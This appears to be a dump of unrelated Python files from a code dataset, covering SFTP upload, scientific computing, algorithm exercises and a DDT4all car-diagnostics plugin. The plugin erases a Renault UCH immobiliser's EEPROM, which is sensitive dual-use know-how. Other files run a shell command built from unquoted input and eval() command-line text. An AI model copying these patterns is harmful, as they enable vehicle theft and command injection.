= paramiko.SSHClient()\n\n\n t = paramiko.Transport((config.SFTP_HOSTIP, config.SFTP_PORT))\n t.connect(username=config.SFTP_USERNAME, password=config.SFTP_PASSWORD)\n sftp = paramiko.SFTPClient.from_transport(t)\n #\n # # 允许将信任的主机自动加入到host_allow 列表,此方法必须放在connect方法的前面\n # ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n # # connect to host\n # try:\n # ssh.connect(hostname=config.SFTP_HOSTIP,\n # port=config.SFTP_PORT,\n # username=config.SFTP_USERNAME,\n # password=config.SFTP_PASSWORD,\n # timeout=15)\n # except Exception as e:\n # raise\n # else:\n # stdin, stdout, stderr = ssh.exec_command('ls')\n # for line in stdout:\n # print('stdout',line)\n #\n # for line in stderr:\n # print('stderr',line)\n # sftp = paramiko.SFTPClient.from_transport(ssh)\n\n for file in os.listdir(dir):\n if file.endswith('.csv'):\n try:\n new_file_name = '{}_{}'.format(user, file)\n try:\n os.rename(os.path.join(dir,file), os.path.join(dir, new_file_name))\n except Exception as e:\n logging.error('rename error')\n raise\n else:\n local_file = os.path.join(dir, new_file_name)\n remote_dir = os.path.join(config.SFTP_DIR, new_file_name)\n sftp.put(local_file, remote_dir)\n except Exception as e:\n raise\n else:\n logging.info('process for file {}'.format(os.path.join(dir, new_file_name)))\n os.remove(os.path.join(dir, new_file_name))\n\n ssh.close()\n\ndef mkdir(user):\n # make up the dirctory in selenium server to store the report for user\n # and return the dirctory name\n logging.debug('in make dir')\n dir_name = os.path.join(config.DEFAULT_DIR, user)\n if not os.path.exists(dir_name):\n output = os.popen('mkdir {}'.format(dir_name))\n logging.debug('create dir, the result is {}'.format(output.read()))\n return dir_name\n\nif __name__ == '__main__':\n # trigger_send_to_ftpserver(HOSTNAME)\n # set_environment(hostname='9.112.56.150')\n\n from downloader import MyRequest\n\n request = {}\n\n r = MyRequest(request)\n r.dirname = os.path.curdir\n send_to_sftpserver(r, 
r.dirname)\n","sub_path":"utils/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293517992","text":"#!/usr/bin/env python\n\ntry:\n from setuptools import setup\n test_extras = {\n 'test_suite': 'pythonosc.test',\n }\nexcept ImportError:\n from distutils.core import setup\n test_extras = {}\n\n\nsetup(\n name='python-osc',\n version='1.6',\n author='attwad',\n author_email='tmusoft@gmail.com',\n description=(\n 'Open Sound Control server and client implementations in pure Python'),\n long_description=open('README.rst').read(),\n url='https://github.com/attwad/python-osc',\n platforms='any',\n packages=[\n 'pythonosc',\n 'pythonosc.parsing',\n 'pythonosc.test',\n 'pythonosc.test.parsing',\n ],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3',\n 'Topic :: Multimedia :: Sound/Audio',\n 'Topic :: System :: Networking',\n ],\n **test_extras\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"223997739","text":"'''\r\nread precatórios from text file\r\n'''\r\nimport csv\r\nimport sys\r\nimport re\r\n\r\nclass Precatorio():\r\n def __init__(self, num):\r\n self.code = num\r\n self.value = -1\r\n self.description = ''\r\n \r\n def set_description(self, desc:str):\r\n self.description = desc\r\n \r\n def set_value(self, val:int):\r\n self.value = val\r\n\r\n def has_description(self):\r\n return self.description != '' and self.description is not None\r\n\r\n def __str__(self):\r\n return '[{}] {} (R$ {})'.format(\r\n self.code,\r\n self.description,\r\n self.value\r\n )\r\n\r\ndef is_precatorio(text:str):\r\n m = re.search('\\d{20}', text)\r\n return m is not None\r\n\r\ndef is_money_value(text:str):\r\n m = 
re.search('[^\\d\\.]', text)\r\n return m is None\r\n\r\ntext_file = open(sys.argv[1], 'r', encoding='utf-8')\r\nprevious_line = ''\r\nprecatorios = []\r\nvalores = []\r\nreading_values = False\r\n\r\nsilent = '-s' in sys.argv\r\n\r\nfor line in text_file:\r\n line = line.replace('\\n', '')\r\n if line == '':\r\n continue\r\n if is_precatorio(line):\r\n # significa que temos o código do precatório, então\r\n # a linha anterior é a descrição dele\r\n p = Precatorio(line)\r\n precatorios.append(p)\r\n else:\r\n if precatorios and not reading_values and not precatorios[len(precatorios) - 1].has_description():\r\n precatorios[len(precatorios) - 1].set_description(line)\r\n \r\n if 'VALOR (R$)' in line:\r\n reading_values = True\r\n\r\n if is_money_value(line) and reading_values:\r\n valores.append(int(line.replace('.', '')))\r\n\r\nif len(precatorios) == len(valores):\r\n with open(sys.argv[2], mode='w', newline='') as csvfile:\r\n writer = csv.writer(csvfile, delimiter=',', quotechar='\"')\r\n for p, v in zip(precatorios, valores):\r\n p.set_value(v)\r\n if not silent:\r\n print(p)\r\n writer.writerow([p.code, p.description, p.value])\r\nelse:\r\n print('Lista de valores e lista de precatórios não batem.')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220039046","text":"# -*- coding: utf-8 -*-\n\n# (c) 2017\n# This is an example plugin\n\nimport PyQt5.QtCore as core\nimport PyQt5.QtWidgets as gui\n\nimport ecu\nimport options\n\n_ = options.translator('ddt4all')\n\nplugin_name = _(\"Megane/Scenic II UCH Reset\")\ncategory = _(\"UCH Tools\")\nneed_hw = True\n\n\nclass Virginizer(gui.QDialog):\n def __init__(self):\n super(Virginizer, self).__init__()\n self.megane_uch = ecu.Ecu_file(\"UCH_84_J84_03_60\", True)\n layout = gui.QVBoxLayout()\n infos = gui.QLabel(\n _(\"MEGANE II UCH VIRGINIZER
THIS PLUGIN WILL ERASE YOUR UCH
GO AWAY IF YOU HAVE NO IDEA OF WHAT IT MEANS
\"))\n infos.setAlignment(core.Qt.AlignHCenter)\n check_button = gui.QPushButton(_(\"Check UCH Virgin\"))\n self.status_check = gui.QLabel(_(\"Waiting\"))\n self.status_check.setAlignment(core.Qt.AlignHCenter)\n self.virginize_button = gui.QPushButton(_(\"Virginize UCH\"))\n layout.addWidget(infos)\n layout.addWidget(check_button)\n layout.addWidget(self.status_check)\n layout.addWidget(self.virginize_button)\n self.setLayout(layout)\n self.virginize_button.setEnabled(False)\n self.virginize_button.clicked.connect(self.reset_ecu)\n check_button.clicked.connect(self.check_virgin_status)\n self.ecu_connect()\n\n def ecu_connect(self):\n connection = self.megane_uch.connect_to_hardware()\n if not connection:\n options.main_window.logview.append(_(\"Cannot connect to ECU\"))\n self.finished()\n\n def check_virgin_status(self):\n self.start_diag_session_aftersales()\n\n virigin_check_request = self.megane_uch.requests[u'Status général des opérations badges Bits']\n request_values = virigin_check_request.send_request()\n\n if request_values is not None:\n virgin = request_values[u\"VSC UCH vierge (NbBadgeAppris=0)\"]\n if virgin == u'Vierge':\n self.virginize_button.setEnabled(False)\n self.status_check.setText(_(\"UCH virgin\"))\n return\n\n if virgin == u'Codée':\n self.virginize_button.setEnabled(True)\n self.status_check.setText(_(\"UCH coded\"))\n return\n\n self.status_check.setText(_(\"UNEXPECTED RESPONSE\"))\n\n def start_diag_session_study(self):\n sds_request = self.megane_uch.requests[u\"StartDiagSession Etude\"]\n sds_stream = \" \".join(sds_request.build_data_stream({}))\n if options.simulation_mode:\n print(\"SdSA stream\", sds_stream)\n return\n options.elm.start_session_can(sds_stream)\n\n def start_diag_session_aftersales(self):\n sds_request = self.megane_uch.requests[u\"Start Diagnostic Session\"]\n sds_stream = \" \".join(sds_request.build_data_stream({}))\n if options.simulation_mode:\n print(\"SdSS stream\", sds_stream)\n return\n 
options.elm.start_session_can(sds_stream)\n\n def reset_ecu(self):\n self.start_diag_session_study()\n\n reset_request = self.megane_uch.requests[u\"RAZ EEPROM\"]\n request_response = reset_request.send_request()\n\n if request_response is not None:\n self.status_check.setText(_(\"CLEAR EXECUTED\"))\n else:\n self.status_check.setText(_(\"CLEAR FAILED\"))\n\n\ndef plugin_entry():\n v = Virginizer()\n v.exec_()\n","sub_path":"megane2_uch_reset.py","file_name":"megane2_uch_reset.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513703723","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n# Web Page抓取器\n\nimport sys\nimport urllib\nimport urllib2\nimport cookielib\nfrom gzip import GzipFile\nfrom StringIO import StringIO\nfrom encoding_processor import *\n\nclass WebFetcher:\n ''' web page fetcher class '''\n\n def set_proxy_support(self, type, host):\n proxy = urllib2.ProxyHandler({type:host})\n opener = urllib2.build_opener(proxy, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def set_cookie_support(self):\n cookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar())\n opener = urllib2.build_opener(cookie, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def set_encoding_support(self):\n encoding = ContentEncodingProcessor()\n opener = urllib2.build_opener(encoding, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def set_proxy_and_cookie_and_encoding_support(self, type, host):\n proxy = urllib2.ProxyHandler({type:host})\n cookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar())\n encoding = ContentEncodingProcessor()\n opener = urllib2.build_opener(proxy, cookie, encoding, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def get_url_host(self, url):\n url_list = url.split(\"/\")\n url_host = url_list[2]\n return url_host\n\n def make_http_header(self, url):\n host = self.get_url_host(url)\n http_header = 
{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0',\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\",\n \"DNT\": \"1\",\n 'Host': host}\n return http_header\n\n def make_http_request(self, url_base, post_field_dict):\n http_header = self.make_http_header(url_base)\n\n if post_field_dict is None:\n post_data = None\n else:\n post_data = urllib.urlencode(post_field_dict)\n\n http_request = urllib2.Request(url = url_base + \"?\" + post_data, data = None, headers = http_header)\n return http_request\n\n def do(self, url_base, post_field_dict = None):\n http_request = self.make_http_request(url_base, post_field_dict)\n res_content = urllib2.urlopen(http_request).read()\n return res_content\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n sys.exit(1)\n\n url = sys.argv[1]\n post_field_dict = eval(sys.argv[2])\n out_file = sys.argv[3]\n\n fetcher = WebFetcher()\n fetcher.set_encoding_support()\n page_content = fetcher.do(url, post_field_dict)\n\n fd = open(out_file, \"w\")\n fd.write(page_content + \"\\n\")\n fd.flush()\n fd.close()\n\n","sub_path":"solution/tradesman/python/web_fetcher.py","file_name":"web_fetcher.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159020021","text":"from glob import glob\n\nfrom .filecontext import FileContext\nfrom .utils import typename, printable_string_sequence\nfrom .sfdata import SFData\nfrom .sfdatafile import SFDataFile\n\n\nclass SFDataFiles(FileContext, SFData):\n\n def __init__(self, *patterns):\n self.fnames = fnames = explode_filenames(patterns)\n if not fnames:\n patterns = printable_string_sequence(patterns)\n raise ValueError(f\"No matching file for patterns: {patterns}\")\n self.files = [SFDataFile(fn) for fn in fnames]\n super().__init__()\n for f 
in self.files:\n self.update(f)\n\n def close(self):\n for f in self.files:\n f.close()\n\n def __repr__(self):\n tn = typename(self)\n fns = self.fnames\n fns = \"\\\", \\\"\".join(fns)\n entries = len(self)\n return f\"{tn}(\\\"{fns}\\\"): {entries} channels\"\n\n\n\ndef explode_filenames(patterns):\n fnames = []\n for p in patterns:\n fns = glob(p)\n fnames.extend(fns)\n fnames = sorted(set(fnames))\n return fnames\n\n\n\n","sub_path":"sfdata/sfdatafiles.py","file_name":"sfdatafiles.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"565785226","text":"import math\nimport numpy as np\nfrom scipy import interpolate\nfrom sklearn.model_selection import KFold\n\n\ndef calculate_distance(embeddings1, embeddings2, distance_metric=0):\n '''\n Calculate distance of embeddings1 and embeddings2\n\n Args:\n embeddings1: the first embeddings\n embeddings2: the second embeddings\n distance_metric: the metric use for distance calculate[0:Euclidian 1:Cosine]\n '''\n if distance_metric == 0:\n # Euclidian distance\n diff = np.subtract(embeddings1, embeddings2)\n dist = np.sum(np.square(diff), 1)\n elif distance_metric == 1:\n # Distance based on cosine similarity\n dot = np.sum(np.multiply(embeddings1, embeddings2), 1)\n norm = np.linalg.norm(embeddings1, axis=1)*np.linalg.norm(embeddings2, axis=1)\n similarity = dot / norm\n dist = np.arccos(similarity) / math.pi\n else: \n raise 'Undefined distance metric %d' % distance_metric\n return dist.reshape(-1, 1)\n\n\ndef calculate_accuracy(threshold, dist, actual_issame):\n '''\n Calculate accuracy of the fixed threshold\n\n Args:\n threshold: distance less than threshold will be regard as identical\n dist: the distance of embedding1 and embbeding2\n actual_issame: the true flag indicate which pair is same\n '''\n predict_issame = np.less(dist, threshold)\n tp = np.sum(np.logical_and(predict_issame, actual_issame))\n fp = 
np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))\n tn = np.sum(np.logical_and(np.logical_not(predict_issame), \n np.logical_not(actual_issame)))\n fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issame))\n\n tpr = 0 if (tp+fn==0) else tp / (tp+fn)\n fpr = 0 if (fp+tn==0) else fp / (fp+tn)\n acc = (tp+tn) / dist.size\n return tpr, fpr, acc\n\n\ndef calculate_roc(thresholds, embeddings1, embeddings2, actual_issame, \n nrof_folds=10, distance_metric=0, subtract_mean=False):\n '''\n Calculate roc\n\n Args:\n thresholds: all the thresholds use for calculate roc\n embeddings1: the first embeddings\n embeddings2: the second embeddings\n actual_issame: the true flag indicate which pair is same\n nrof_folds: number of folds\n distance_metric: the metric use for distance calculate[0:Euclidian 1:Cosine]\n subtract_mean: Subtract feature mean before calculating distance\n '''\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n tprs = np.zeros((nrof_folds, nrof_thresholds))\n fprs = np.zeros((nrof_folds, nrof_thresholds))\n accuracy = np.zeros((nrof_folds))\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if subtract_mean:\n # providing the dimension(features) of embeddings1/2 is 512\n # calculate mean of each features\n mean = np.mean(np.concatenate([embeddings1[train_set], \n embeddings2[train_set]]), axis=0)\n else:\n mean = 0\n dist = calculate_distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the best threshold for the fold\n acc_train = np.zeros((nrof_thresholds))\n for threshold_idx, threshold in enumerate(thresholds):\n _, _, acc_train[threshold_idx] = calculate_accuracy(threshold, \n dist[train_set], actual_issame[train_set])\n 
best_threshold_idx = np.argmax(acc_train)\n for threshold_idx, threshold in enumerate(thresholds):\n tprs[fold_idx, threshold_idx], fprs[fold_idx, threshold_idx], _ = \\\n calculate_accuracy(threshold, dist[test_set], actual_issame[test_set])\n _, _, accuracy[fold_idx] = calculate_accuracy(thresholds[best_threshold_idx],\n dist[test_set], actual_issame[test_set])\n\n tpr = np.mean(tprs, 0)\n fpr = np.mean(fprs, 0)\n return tpr, fpr, accuracy\n\n\ndef calculate_tar_far(threshold, dist, actual_issame):\n '''\n Calculate true acceptance rate and false acceptance rate\n '''\n predict_issame = np.less(dist, threshold)\n true_accept = np.sum(np.logical_and(predict_issame, actual_issame))\n false_accept = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))\n n_same = np.sum(actual_issame)\n n_diff = np.sum(np.logical_not(actual_issame))\n tar = float(true_accept) / float(n_same)\n far = float(false_accept) / float(n_diff)\n return tar, far\n\n\ndef calculate_tar(thresholds, embeddings1, embeddings2, actual_issame, far_target, \n nrof_folds=10, distance_metric=0, substract_mean=False):\n '''\n Using cross validation, Find the threshold in thresholds that fase acceptance \n will less than far_target. 
And then calculate true acceptance rate and \n corresponding std, fase acceptance rate\n\n Args:\n thresholds: all the thresholds use for calculate roc\n embeddings1: the first embeddings\n embeddings2: the second embeddings\n actual_issame: the true flag indicate which pair is same\n far_target: false acceptance rate target for find best threshold\n nrof_folds: number of folds\n distance_metric: the metric use for distance calculate[0:Euclidian 1:Cosine]\n subtract_mean: Subtract feature mean before calculating distance\n '''\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n tar = np.zeros(nrof_folds)\n far = np.zeros(nrof_folds)\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if substract_mean:\n mean = np.mean(np.concatenate([embeddings1[train_set], \n embeddings2[train_set]], axis=0), axis=0)\n else:\n mean = 0\n dist = calculate_distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the threshold that gives FAR = far_target\n # which means that find threshold to make false acceptance rate \n # less than(or equal to) far_target\n far_train = np.zeros(nrof_thresholds)\n for threshold_idx, threshold in enumerate(thresholds):\n _, far_train[threshold_idx] = calculate_tar_far(threshold, \n dist[train_set], actual_issame[train_set])\n if np.max(far_train) >= far_target:\n f = interpolate.interp1d(far_train, thresholds, kind='slinear')\n threshold = f(far_target)\n else:\n threshold = 0.0\n\n tar[fold_idx], far[fold_idx] = calculate_tar_far(threshold, \n dist[test_set], actual_issame[test_set])\n \n tar_mean = np.mean(tar)\n far_mean = np.mean(far)\n tar_std = np.std(tar)\n return tar_mean, tar_std, 
far_mean","sub_path":"ml_utils/eval_metrics.py","file_name":"eval_metrics.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"147562528","text":"class Solution:\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n for i in range(len(board)):\n for j in range(len(board[0])):\n if self.dfs(board, i, j, word):\n return True\n return False\n\n def dfs(self,board,i,j,word):\n if not word:\n return True\n if i not in range(len(board)) or j not in range(len(board[0])):\n return False\n if board[i][j]!=word[0]:\n return False\n tmp=board[i][j]\n board[i][j]='#'\n res=self.dfs(board,i-1,j,word[1:]) or self.dfs(board,i+1,j,word[1:]) or self.dfs(board,i,j-1,word[1:]) or self.dfs(board,i,j+1,word[1:])\n board[i][j]=tmp\n return res\n\ndef main():\n so=Solution()\n print(so.exist([[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]],\"ABCCED\"))\n\nif __name__ == '__main__':\n main()","sub_path":"79_WordSearch.py","file_name":"79_WordSearch.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"595111786","text":"# TO DELETE vvvvvvvvvvvvvvv\nsign_up = [1,0]\nscans = [[1, 2, 4], [3, 6]]\n# TO DELETE ^^^^^^^^^^^^^^^\n\nf = open(\"solution\",\"w+\")\nf.write(\"%d\\n\" % len(sign_up))\ni = 0\nfor lib in sign_up :\n\tf.write(\"%d %d\\n\" % (lib, len(scans[i])))\n\tprint(*scans[i], sep=' ', end='\\n', file=f)\n\ti += 1\nf.close()","sub_path":"output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466158112","text":"# KMP算法\n\n# 首先计算next数组,即我们需要怎么去移位\n# 接着我们就是用暴力解法求解即可\n# next是用递归来实现的\n# 这里是用回溯进行计算的\ndef calNext(str2):\n i=0\n next=[-1]\n j=-1\n while(i=len(s2)):\n return i 
-len(s2)#说明匹配到最后了\n else:\n return 0\ns1 = \"acabaabaabcacaabc\"\ns2 = \"abaabcac\"\nprint(KMP(s1,s2))\n","sub_path":"practice/practice_4/kmp1.py","file_name":"kmp1.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"190119283","text":"\"\"\"\r\nD E P A R T E M E N F I S I K A - U G M\r\nBulaksumur Yogyakarta, Kabupaten Sleman 55281\r\n-------------------------------------------------------------------------------\r\nAuthor : Reizkian Yesaya .R\r\nEmail : reizkianyesaya@gmail.com\r\nProgram : Advection\r\nCreated : Wed Apr 24 22:23:10 2019\r\n\"\"\"\r\nimport numpy as np\r\nimport mayavi.mlab as mlab\r\nimport matplotlib.pyplot as plt\r\n\r\nN=2**9\r\nL=1\r\n#dt=0.01\r\nimg=(0+1.j)\r\nx = np.linspace(-L,L,N)\r\n\r\nu=0.02\r\nd=0\r\nnu=0.001\r\n\r\nf=np.zeros(N)\r\nfor i in range(int(N/2-50),int(N/2+50)):\r\n f[i]=1\r\n\r\n\r\nf = 1/(np.cosh(10.0*x)**2)\r\nf_hat = np.fft.fft(f)\r\n\r\n# k-space construction\r\nk_plus=np.arange(0,N/2+1,1)\r\nk_minus=np.arange(-N/2,0,1)\r\nk_array=np.hstack((k_plus,k_minus))\r\n\r\ndk=np.pi/L\r\nk=k_array*dk\r\nk2=k**2\r\n\r\ntmax=10\r\nN_t=100\r\ndt=tmax/N_t\r\n\r\nplt.plot(x,f)\r\nfor t in range(0,N_t,10):\r\n for i in range (0,N):\r\n c = (img*k[i]*u)-(k2[i]*d)\r\n f_hat[i]=f_hat[i]*np.exp(c*(t*dt))\r\n\r\n f_xt=np.real(np.fft.ifft(f_hat))\r\n\r\n time=dt*t\r\n print(\"time = \",time,\" sec\")\r\n plt.plot(x,f_xt)\r\n plt.grid(True)\r\n plt.show()\r\n\r\nprint(\"=== PROGRAM HAS BEEN SUCESSFULLY EXECUTED ===\")\r\n\r\n# =============================================================================\r\n# fig1 = plt.figure()\r\n# ax1 = fig1.add_subplot(111)\r\n# ax1.plot(k_array,f_fft,'r')\r\n# plt.title('')\r\n# plt.grid(True) \r\n# \r\n# fig2 = plt.figure()\r\n# ax2 = fig2.add_subplot(111)\r\n# ax2.plot(x,f,'b')\r\n# plt.title('')\r\n# plt.grid(True) \r\n# 
=============================================================================\r\n","sub_path":"Advection.py","file_name":"Advection.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109073185","text":"import numpy as np \nimport pandas as pa\nfrom scipy.sparse import csr_matrix, isspmatrix\nimport pyensembl \nfrom pyensembl import EnsemblRelease\n\ndef normalizeUMIWithscalefactor(data, scale_factor=10e6):\n cellNormalizedData=np.log(1+(data/np.sum(data,axis=1)[0]))*scale_factor\n return(cellNormalizedData)\n\ndef gene_Length(list_of_genes, ensembl_id=True, Ensembl_Release=75):\n gn=EnsemblRelease(Ensembl_Release)\n if ensembl_id:\n gene_pos=list(map(gn.locus_of_gene_id, list_of_genes))\n gene_pos_end=[i.end for i in gene_pos]\n gene_pos_start=[i.start for i in gene_pos]\n \n else:\n gene_pos=list(map(gn.loci_of_gene_names, list_of_genes))\n gene_pos_end=[i[0].end for i in gene_pos]\n gene_pos_start=[i[0].start for i in gene_pos]\n\n gene_len=np.array(gene_pos_end)-np.array(gene_pos_start)\n return pa.DataFrame({'gene_names':list_of_genes, \"gene_length\":gene_len/1000}) \n\ndef getTPM(rowCountData, gene_Names=None, index_column=None, ensembol_gene=False, Ensembl_release=75):\n\n if(isspmatrix(rowCountData)):\n rowCountData=pa.DataFrame(rowCountData.toarray())\n rowCountData.index=gene_Names\n \n else:\n if index_column is not None:\n rowCountData.index=rowCountData[index_column]\n rowCountData=rowCountData.drop([index_column], axis=1)\n\n if ensembol_gene:\n known_genes=list(map(pyensembl.common.is_valid_ensembl_id,gene_Names)) \n rowCountData=rowCountData.iloc[known_genes,:]\n \n rowCountData.index=np.array(gene_Names)[np.array(known_genes)]\n \n gene_length=gene_Length(gene_Names, ensembl_id=ensembol_gene, Ensembl_Release=Ensembl_release) \n else:\n\n gene_length=gene_Length(gene_Names, ensembl_id=ensembol_gene, Ensembl_Release=Ensembl_release) \n \n 
if(gene_length.shape[0]==rowCountData.shape[0]):\n \n count_data_RKB=rowCountData.div(list(gene_length[\"gene_length\"]), axis=0)\n \n count_data_TPM=np.array(count_data_RKB)/ np.array(rowCountData.sum(axis=0)).reshape((1,len(rowCountData.sum(axis=0))))\n \n count_data_TPM=pa.DataFrame(count_data_TPM*10e6)\n count_data_TPM.index=list(rowCountData.index)\n count_data_TPM.columns=list(rowCountData.columns)\n \n count_data_TPM=count_data_TPM[(count_data_TPM.T != 0).any()].dropna(axis=0)\n else:\n print(\"one or more gene ids are not annoatated under\", Ensembl_Release, \"Please use different release\")\n \n return count_data_TPM.T, list(count_data_TPM.index)\n\ndef ENSEMBLID_to_geneSymbol(ENSEMBL, Ensembl_Release=75): \n data=EnsemblRelease(Ensembl_Release)\n if type(ENSEMBL) is list:\n Genes=list(map(data.gene_name_of_gene_id,ENSEMBL))\n else:\n Genes=data.gene_name_of_gene_id(ENSEMBL)\n return Genes\n\n","sub_path":"MICTI/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"335232351","text":"# Este es el procedimientos para crear y llenar la lista o el arreglo\ndef crear_lista():\n\tglobal lista\n\tlista=[]\n\tprint(\"Cuanto elementos tendra la lista\")\n\telementos=input()\n\telementos=int(elementos)\n\tfor i in range(0,elementos):\n\t\tprint(\"Ingrese el valor de el elemento: \",i)\n\t\tvalor=input()\n\t\tvalor=int(valor)\n\t\tlista.append(valor)\n\t\t\n#Agregar Elemento a la lista \ndef agregar_elemento():\n\tprint (\"Ingrese la posicion que quiere agregar :\")\n\tposicion=input()\n\tposicion=int(posicion)\n\tprint (\"Ingrese el valor que quiere agregar :\")\n\tnuevo_elemento=input()\n\tnuevo_elemento=int(nuevo_elemento)\n\tlongitud=len(lista)\n\tlongitud=int(longitud)\n\tif posicion>longitud or posicion<0:\n\t\tprint(\"Indice debe de estar entre 0 y \",longitud 
)\n\telse:\n\t\tlista.insert(posicion,nuevo_elemento)\n\t\tprint(\"Nuevo Elemento Agregado Correctamente \")\n\t\n#Modificar Elemento a la lista \ndef modificar_elemento():\n\tprint (\"Ingrese la posicion que quiere modificar :\")\n\tposicion=input()\n\tposicion=int(posicion)\n\tprint (\"Ingrese el valor que quiere modificar :\")\n\tnuevo_elemento=input()\n\tnuevo_elemento=int(nuevo_elemento)\n\tlongitud=len(lista)\n\tlongitud=int(longitud)\n\tif posicion>longitud or posicion<0:\n\t\tprint(\"Para modificar el indice debe de estar entre 0 y \",longitud )\n\telse:\n\t\tlista[posicion]=nuevo_elemento\n\t\tprint(\"El Elemento ha sido modificado correctamente \")\n\n#Eliminar Elemento a la lista \ndef eliminar_elemento():\n\tprint (\"indique el indice a eliminar\")\n\tindice=input()\n\tindice=int(indice)\n\tlongitud=len(lista)\n\tlongitud=int(longitud)\n\tif indice>longitud or indice<0:\n\t\tprint(\"Para eliminar el indice debe de estar entre 0 y \",longitud-1 )\n\telse:\n\t\tdel lista[indice]\n\t\tprint(\"Elemento eliminado \")\n\t\n\n#Este es el procedimiento que me muestra la lista \ndef mostrar_lista():\n\tprint(\"La lista es : \" ,lista)\n\t \n#---------------Cuerpo principal-------------------------------\nsalir=0\nwhile salir!=5:\n\tprint (\"\\t\\t\\t================================\\n\")\n\tprint (\"\\t\\t\\tOPERACIONES CON LISTAS\\n\\n\")\n\tprint (\"\\t\\t\\t[1. Crear una lista ]\\n\")\n\tprint (\"\\t\\t\\t[2. Ingresar datos a la lista ]\\n\")\n\tprint (\"\\t\\t\\t[3. Modificar datos de la lista]\\n\")\n\tprint (\"\\t\\t\\t[4. Eliminar datos de la lista ]\\n\")\n\tprint (\"\\t\\t\\t[5. 
Salir del programa ]\\n\")\n\topcion=int(input(\"\\t\\t\\t[Ingrese una opcion : \"))\n\tprint (\"\\t\\t\\t================================\\n\")\n\t\n\tif opcion==1:\n\t\tcrear_lista()\n\t\tmostrar_lista()\n\telif opcion==2:\n\t\ttry:\n\t\t\tagregar_elemento()\n\t\t\tmostrar_lista()\n\t\texcept:\n\t\t\tprint (\"Se genero un error es posible que la lista no ha sido creada,\\n Verifique opcion 1 \")\n\telif opcion==3:\n\t\ttry:\n\t\t\tmodificar_elemento()\n\t\t\tmostrar_lista()\n\t\texcept:\n\t\t\tprint (\"Se genero un error es posible que la lista no ha sido creada,\\n Verifique opcion 1 \")\n\telif opcion==4:\n\t\ttry:\n\t\t\teliminar_elemento()\n\t\t\tmostrar_lista()\n\t\texcept:\n\t\t\tprint (\"Se genero un error es posible que la lista no ha sido creada,\\n Verifique opcion 1 \")\n\telif opcion==5:\n\t\tprint(\"\\t\\t\\tFin del programa\")\n\t\tsalir=5\n\telse:\n\t\tprint(\"\\t\\t\\tOpcion incorrecta\")","sub_path":"EjercicioListas.py","file_name":"EjercicioListas.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 